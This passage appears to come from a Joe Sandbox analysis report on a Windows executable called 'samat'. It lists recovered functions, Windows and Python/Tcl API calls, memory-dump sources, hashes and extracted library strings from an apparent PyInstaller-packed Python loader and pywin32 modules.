                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EAA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5EBB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC
                                                                                                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7E12E5ECC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12E55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: HeapFree.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968
                                                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                                                      • Instruction ID: ec6905452d3a93276458e62181b3dfd23d87d646b480793fcc8ea68b0a1b986e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C519276B1864246E711FF31DC826A9E769FB58784FC0813BEA0E83695DFBCE4008761
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5840
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5852
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5889
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C589B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58B4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58C6
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58DF
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C58F1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C590D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C591F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C593B
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C594D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5969
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C597B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C5997
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59A9
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59C5
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7E12C64CF,?,00007FF7E12C336E), ref: 00007FF7E12C59D7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                      • Instruction ID: 984ed8757276d6120e08ce48f0a8d5039e414908a698defd7d51a856468169ef
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D522B560B09B0781FB06FB65AC167B5A3A9BF15754FC49437C42E82260EFFDB558C222
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                      • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                      • Instruction ID: b7218dcfee3b163d06d2ccc0e6fc4f2aface9758e9a0294c1fdaf2dc1092c870
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D02D520B09B0B82EF16BB55EC163B4A3A9BF14744FD09137D52E46260EFBDB149C232
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ReadyType_$Dict_String$DeallocItem$State_SwapThread$ErrorFatalFuncImport$AllocCapsule_DecodeFlagsImport_LocalModuleRun_Unicode_Value
                                                                                                                                                                                                                                                                                      • String ID: Exception$Out of memory allocating thread state.$PyWinInterpreterState_Ensure$__builtins__$__name__$builtins$class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =$com_error$datetime.datetime_CAPI$error$ignore$pywintypes$pywintypes: can not setup interpreter state, as current state is invalid
                                                                                                                                                                                                                                                                                      • API String ID: 3484552599-1312685011
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e559cf5b5cfc2f2b8ba3100ed33c113d64749a0116b8bc114fdaa9902568029
                                                                                                                                                                                                                                                                                      • Instruction ID: 83d34a21c552652bf1a3999ba5c1d026c04817420103b370063ce33738504c60
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e559cf5b5cfc2f2b8ba3100ed33c113d64749a0116b8bc114fdaa9902568029
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CA1D336A08B0791FA058B6DE85427D23A0FF49FE5F844235EA1E826F5EF3DE9158310
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dict_String$Item$ReadyType_$State_SwapThread$Module_$ErrorFatalFunc$AllocConstantCreate2DeallocDecodeDictErr_LocalUnicode_Value
                                                                                                                                                                                                                                                                                      • String ID: ACLType$Could not initialise the error objects$DEVMODEType$DEVMODEWType$FALSE$HANDLEType$IIDType$OVERLAPPEDType$SECURITY_ATTRIBUTESType$SECURITY_DESCRIPTORType$SIDType$TRUE$TimeType$WAVEFORMATEXType$WAVE_FORMAT_PCM$com_error$error
                                                                                                                                                                                                                                                                                      • API String ID: 2302314715-313003814
                                                                                                                                                                                                                                                                                      • Opcode ID: de223336d6068828db36fb0dc1bb87c70e4bd450320daeffceca65b23cb5c0d5
                                                                                                                                                                                                                                                                                      • Instruction ID: aef127bf2637e775221334eb030071507ff50a84e194cbfe2e8c173d6c3b1f29
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de223336d6068828db36fb0dc1bb87c70e4bd450320daeffceca65b23cb5c0d5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5591B665D18B0391F6089BACFC581BC2761AF55FE4F940632E62E821F1EF7CE95AC250
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dealloc$ImportImport_Module$FreeMem__wcsdup
                                                                                                                                                                                                                                                                                      • String ID: <Error getting traceback - cStringIO.StringIO() failed>$<Error getting traceback - can't find cStringIO.StringIO>$<Error getting traceback - can't find getvalue function>$<Error getting traceback - can't find traceback.print_exception>$<Error getting traceback - can't import cStringIO>$<Error getting traceback - can't import traceback>$<Error getting traceback - can't make print_exception arguments>$<Error getting traceback - getvalue() did not return a string>$<Error getting traceback - getvalue() failed.>$<Error getting traceback - traceback.print_exception() failed>$<NULL!!>$Getting WCHAR string$None is not a valid string in this context$OOOOOi$Objects of type '%s' can not be converted to Unicode.$StringIO$getvalue$print_exception$traceback
                                                                                                                                                                                                                                                                                      • API String ID: 2735870070-3599414692
                                                                                                                                                                                                                                                                                      • Opcode ID: 0043d422bc0162b250e8750caf090f3e3b7605d422a7505aa728d4c321d93bbf
                                                                                                                                                                                                                                                                                      • Instruction ID: 1fc1190ca7a300b7c5f947e5f12ddfa7262e129df957fcf995e18fc6450faa51
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0043d422bc0162b250e8750caf090f3e3b7605d422a7505aa728d4c321d93bbf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69A1D522A0DB42D9FA559B5AE85827D23A5BF55FC5F884035EB0E426B6EF3CE944C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetExplicitEntriesFromAclW.ADVAPI32 ref: 00007FF8B7E82623
                                                                                                                                                                                                                                                                                      • PyTuple_New.PYTHON313 ref: 00007FF8B7E82651
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313 ref: 00007FF8B7E826FB
                                                                                                                                                                                                                                                                                      • Py_BuildValue.PYTHON313 ref: 00007FF8B7E8287C
                                                                                                                                                                                                                                                                                      • PyTuple_SetItem.PYTHON313 ref: 00007FF8B7E82890
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 00007FF8B7E82908
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuildErr_FreeLocalTuple_Value$DecodeEntriesErrorExplicitFormatFromItemLastMessageObjectStringUnicode_
                                                                                                                                                                                                                                                                                      • String ID: AccessMode$AccessPermissions$GetExplicitEntriesFromAcl$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
                                                                                                                                                                                                                                                                                      • API String ID: 1576682769-3224252679
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a51bc5ec4fdc2f2b2449b67a7b18b879f8b3dee29234ec28016f6faf2fd6655
                                                                                                                                                                                                                                                                                      • Instruction ID: 374ba2334f4f6d83aa4d1a6a3b0cc61a12e5710dd13833259a0f8e5056345f7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a51bc5ec4fdc2f2b2449b67a7b18b879f8b3dee29234ec28016f6faf2fd6655
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1910236A08B8686EA608F59E44026D73A8FF48FD0F944036DB8D87775DE3DE689C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Dealloc$String$LongNumber_Object_$ArgumentAttrBuildCallCheckClearFormatLong_ObjectOccurredSubtypeType_Value_mktime64
                                                                                                                                                                                                                                                                                      • String ID: (d)$Objects of type '%s' can not be used as a time object$iiiiiiiii|i$mktime argument out of range$timetuple$year out of range
                                                                                                                                                                                                                                                                                      • API String ID: 3975405178-3179837657
                                                                                                                                                                                                                                                                                      • Opcode ID: 3ef851e5d06e54bdc5a790e60f5679cb7fcdb0b9f7579482d87791eaca5b7d75
                                                                                                                                                                                                                                                                                      • Instruction ID: c9e2660ac3108d77025efd2238dd54bd5e311e8da2b8e53b69ed4298c900e8a2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ef851e5d06e54bdc5a790e60f5679cb7fcdb0b9f7579482d87791eaca5b7d75
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9A12932A09B4285FB658F69E8442BD23A4EF45FD4F844235EB4E567A6EF3CE544C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dealloc$Err_Sequence_String$Arg_FreeParseTuple$CheckEntriesItemKeywordsLocalMem_SizeTuple_freemallocmemset
                                                                                                                                                                                                                                                                                      • String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$O:SetEntriesInAcl$Parm must be a list of EXPLICIT_ACCESS dictionaries$SetEntriesInAcl$SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W$lllO
                                                                                                                                                                                                                                                                                      • API String ID: 1438466550-1140684800
                                                                                                                                                                                                                                                                                      • Opcode ID: acf0275f699249ee3a72eaa94773bbe7f7b2b370675f5fc8c16df187906dc64b
                                                                                                                                                                                                                                                                                      • Instruction ID: 282942859632e4dc295ba37f5fb0bd6bd2dd8457dcc458130300c6902b88fefd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acf0275f699249ee3a72eaa94773bbe7f7b2b370675f5fc8c16df187906dc64b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66811926A08B8286EB509F69E84427E63A4FF96FC4F984135EB4E43666DF3CE455C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String$Buffer_FormatFromRelease$Arg_BufferCharFreeMem_Object_ParseProgReferenceTupleUnicode_Widemalloc
